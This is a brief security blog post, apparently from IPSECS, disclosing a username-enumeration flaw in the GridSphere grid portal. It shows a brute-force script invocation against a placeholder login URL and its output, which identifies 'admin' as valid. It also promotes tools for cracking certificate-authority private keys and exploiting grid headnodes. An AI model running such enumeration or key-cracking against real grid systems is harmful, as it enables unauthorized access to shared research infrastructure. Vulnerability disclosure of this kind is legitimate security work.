GridSphere is web based portal framework to access grid computing resources. The GridSphere provides an open-source portlet based Web portal. GridSphere enables developers to quickly develop and package third-party portlet web applications that can be run and administered within the GridSphere portlet container.

GridSphere which is critically uses to access grid resource is found to be vulnerable that can be exploited to enumerate a user is valid or not in grid. This vulnerability exist due to the response of gridsphere in handling in-exist user with “User does not exist“. To exploit this issue, you can use this python script.

python gridsphere-brute.py https://example.com/acgt/portal?cid=login users.txt

[INVALID] anto
[INVALID] abc
[INVALID] betha
[INVALID] een
[INVALID] nita
[INVALID] aris
[INVALID] atik
[INVALID] babas
[INVALID] alex
[OK] admin
[INVALID] fuck
[INVALID] lisa
[INVALID] ifa
[INVALID] hana
[INVALID] bram

IPSECS has developed some tools to assess grid computing security years ago which can be download here. The tools is encoded in ASCII and bundled with article which explains grid computing [in]security written in indonesian. The tools provided can be used to:

• Enumerate headnode by identifying GridFTP Service and Web Service Container
• Crack private key in Certificate Authority
• Exploit others headnode in grid when a headnode and its certificate compromised.

For your information, currently IPSECS is developing grid-toolkit to make grid computing penetration much more easier.

Tags: Grid Computing, Grid Hacking, Grid Security
Posted in Exploitation, News